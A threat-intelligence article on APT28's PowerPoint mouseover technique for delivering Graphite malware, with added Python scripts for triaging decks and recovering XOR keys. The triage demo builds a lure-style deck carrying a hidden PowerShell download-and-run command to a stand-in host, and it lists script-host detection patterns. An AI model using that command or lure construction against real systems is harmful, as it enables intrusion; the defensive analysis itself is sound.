Russia-based hackers are using a novel code-execution technique in which moving the mouse over a hyperlink in a Microsoft PowerPoint presentation, while it is in presentation mode, triggers a malicious PowerShell script.
 

What happened?

A Cluster25 report states that APT28, aka Fancy Bear, a threat group linked to the Russian GRU, has used the new technique to deliver the Graphite malware this month. The researchers note that the targets include entities in the defence and government sectors in the EU and Eastern Europe.
 

Modus operandi

The threat actor lures victims with a PowerPoint file purportedly linked to the Organisation for Economic Co-operation and Development (OECD).
  • The file includes two slides with instructions in English and French for accessing the translation feature in Zoom.
  • The presentation contains a hyperlink with a mouseover action: moving the mouse over it while the deck is in presentation mode launches a malicious PowerShell script. No macros are involved, so macro-centric controls do not stop it.
  • The PowerShell script downloads a JPEG image that carries an XOR-encrypted DLL. The final payload is the Graphite malware, a Portable Executable (PE) that lets the attacker load further malware into memory.
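As an added example (not code from the original article or from Cluster25), the following Python script shows how an analyst could triage a .pptx for exactly the trigger described above: it opens the archive, finds hyperlink actions of type ppaction://program on any slide, resolves the r:id to the external target recorded in the slide's relationship part, and flags targets that name a scripting host. The XML layout is the standard PresentationML encoding of a "Run program" hyperlink as I understand it, and the sample deck the script builds is constructed for the demo; it is not the actual lure.

```python
import html
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Standard OOXML namespaces used by PresentationML slide parts and .rels parts.
NS = {
    "a": "http://schemas.openxmlformats.org/drawingml/2006/main",
    "r": "http://schemas.openxmlformats.org/officeDocument/2006/relationships",
    "rel": "http://schemas.openxmlformats.org/package/2006/relationships",
}
# Hyperlink actions can fire on click or on mouse-over; the lure uses the latter.
HLINK_TAGS = ("hlinkMouseOver", "hlinkClick")
# Targets naming a script host or LOLBin deserve an analyst's attention.
SUSPICIOUS_TARGET = re.compile(
    r"(powershell|pwsh|cmd\.exe|rundll32|mshta|wscript|cscript|regsvr32)", re.I)


def find_action_links(pptx_bytes):
    """Return (slide, trigger, action, target) for every hyperlink action in
    the deck whose action is ppaction://program ('Run program'), resolving the
    r:id to the external Target recorded in the slide's .rels part."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(pptx_bytes)) as z:
        names = set(z.namelist())
        for name in sorted(names):
            m = re.fullmatch(r"ppt/slides/(slide\d+)\.xml", name)
            if not m:
                continue
            slide = m.group(1)
            targets = {}
            rels_name = f"ppt/slides/_rels/{slide}.xml.rels"
            if rels_name in names:
                rels = ET.fromstring(z.read(rels_name))
                for rel in rels.findall("rel:Relationship", NS):
                    targets[rel.get("Id")] = rel.get("Target", "")
            root = ET.fromstring(z.read(name))
            for tag in HLINK_TAGS:
                for el in root.iter(f"{{{NS['a']}}}{tag}"):
                    action = el.get("action", "")
                    if action.startswith("ppaction://program"):
                        rid = el.get(f"{{{NS['r']}}}id")
                        hits.append((slide, tag, action, targets.get(rid, "")))
    return hits


def triage(pptx_bytes):
    """Keep only 'Run program' actions whose target looks like a script host."""
    return [h for h in find_action_links(pptx_bytes) if SUSPICIOUS_TARGET.search(h[3])]


def build_sample_pptx(command):
    """Constructed for this example: a minimal PPTX-shaped archive with one
    slide whose shape carries a mouse-over 'Run program' action. It is not a
    real document from the campaign."""
    slide_xml = (
        '<p:sld xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" '
        f'xmlns:a="{NS["a"]}" xmlns:r="{NS["r"]}"><p:cSld><p:spTree>'
        '<p:sp><p:nvSpPr><p:cNvPr id="2" name="Lure text">'
        '<a:hlinkMouseOver r:id="rId2" action="ppaction://program"/>'
        '</p:cNvPr></p:nvSpPr></p:sp></p:spTree></p:cSld></p:sld>'
    )
    rels_xml = (
        f'<Relationships xmlns="{NS["rel"]}">'
        f'<Relationship Id="rId2" Type="{NS["r"]}/hyperlink" '
        f'Target="{html.escape(command, quote=True)}" TargetMode="External"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("ppt/slides/slide1.xml", slide_xml)
        z.writestr("ppt/slides/_rels/slide1.xml.rels", rels_xml)
    return buf.getvalue()


if __name__ == "__main__":
    # Hypothetical command line for the demo; example.invalid is a reserved name.
    deck = build_sample_pptx(
        "powershell.exe -w hidden -c IEX (New-Object Net.WebClient)"
        ".DownloadString('http://example.invalid/p.txt')")
    for slide, trigger, action, target in triage(deck):
        print(f"{slide}: {trigger} -> {action} -> {target}")
```

Because the trigger lives in ordinary slide XML rather than in a VBA project, macro-focused scanners report nothing; the check has to look for the action itself and for what its relationship target points at.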
 

Other details

The downloaded JPEG is in fact an XOR-encrypted DLL; it is decrypted, loaded into memory and executed via rundll32.exe. The chain continues with further downloads, and each new file is obfuscated with its own XOR key, so a key recovered from one stage does not decode the next.
  • Graphite abuses the Microsoft Graph API and OneDrive to communicate with its C2 server, using a fixed client ID to obtain a valid OAuth2 token.
  • With that token, Graphite queries the Graph API for new files in the attacker-controlled OneDrive; any it finds are downloaded and decrypted.
  • The decrypted content is shellcode: Graphite allocates a new memory region, copies the shellcode into it and runs it on a newly created thread, giving the operator remote code execution.
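To illustrate the XOR-obfuscated stages described under Other details, here is an added Python example (not Cluster25's code and not the malware's) that recovers a per-stage XOR key with a known-plaintext attack: it assumes the encrypted DLL has a standard MZ header whose DOS stub message sits at offset 0x4E, tries every offset in the container and every key length up to 16, and accepts a candidate only if the decoded bytes carry an MZ header whose e_lfanew points at a PE signature. The container it analyses is a constructed JFIF prefix followed by a fake, XOR-encoded PE header, not a sample from the campaign; the stub assumption, the offsets and the key are mine.

```python
import struct

# Known plaintext present in a standard MZ header: the DOS stub message, which
# the Microsoft linker places at offset 0x4E. Assumed here; a custom stub differs.
DOS_STUB = b"This program cannot be run in DOS mode"
STUB_OFFSET = 0x4E


def xor_bytes(data, key):
    """XOR data with a repeating key."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def looks_like_pe(blob):
    """True if blob starts with 'MZ' and e_lfanew points at a 'PE\\0\\0' signature."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    return e_lfanew + 4 <= len(blob) and blob[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def recover_key(container, start, key_len):
    """Known-plaintext attack: assuming an encrypted PE begins at `start`,
    derive a repeating key of `key_len` bytes from the DOS stub string.
    Returns None if the stub bytes disagree about any key slot."""
    key = [None] * key_len
    for k, plain in enumerate(DOS_STUB):
        pos = start + STUB_OFFSET + k
        if pos >= len(container):
            return None
        slot = (pos - start) % key_len
        guess = container[pos] ^ plain
        if key[slot] is None:
            key[slot] = guess
        elif key[slot] != guess:
            return None
    if any(b is None for b in key):
        return None
    return bytes(key)


def carve_xor_pe(container, max_key_len=16):
    """Scan every offset and key length (shortest first); return
    (offset, key, decoded_bytes) for the first candidate that decodes to a
    valid-looking PE, or None if nothing fits."""
    last = len(container) - STUB_OFFSET - len(DOS_STUB)
    for start in range(max(last + 1, 0)):
        for key_len in range(1, max_key_len + 1):
            key = recover_key(container, start, key_len)
            if key is None:
                continue
            decoded = xor_bytes(container[start:], key)
            if looks_like_pe(decoded):
                return start, key, decoded
    return None


def build_fake_pe():
    """Constructed for this example: a 256-byte MZ/PE header skeleton with a
    DOS stub and a PE signature. It is not a real or loadable DLL."""
    hdr = bytearray(0x100)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x80)  # e_lfanew -> PE signature offset
    hdr[STUB_OFFSET:STUB_OFFSET + len(DOS_STUB)] = DOS_STUB
    hdr[0x80:0x84] = b"PE\0\0"
    return bytes(hdr)


def build_sample_container(key):
    """Constructed sample 'JPEG': a JFIF-looking prefix followed by the
    XOR-encoded fake PE, mimicking an image that carries an encrypted DLL."""
    jfif_prefix = bytes.fromhex("FFD8FFE000104A46494600") + b"\x00" * 32
    return jfif_prefix + xor_bytes(build_fake_pe(), key)


if __name__ == "__main__":
    stage_key = bytes.fromhex("5AC31788")  # hypothetical per-stage key
    found = carve_xor_pe(build_sample_container(stage_key))
    if found:
        off, key, pe = found
        e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
        print(f"PE at offset {off}, key {key.hex()}, e_lfanew={e_lfanew:#x}")
```

The same routine is rerun on each downloaded stage, which is the practical consequence of the report's observation that every file uses a different key: nothing recovered from the first JPEG carries over, so the analyst needs a key-recovery step that works from the plaintext structure of the payload rather than from a previously seen key.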
 
Conclusion

Cluster25 analysts state that the attackers had been preparing the campaign since January or February, while the URLs used in the attacks were active in August and September. With attackers favouring ever stealthier tradecraft, government and private entities must deploy suitable controls to prevent breaches and protect themselves; for this campaign that means watching for PowerPoint spawning PowerShell or rundll32.exe, directly or through an intermediate process, and for OneDrive or Microsoft Graph traffic originating from anything other than legitimate Microsoft applications.
Cyware Publisher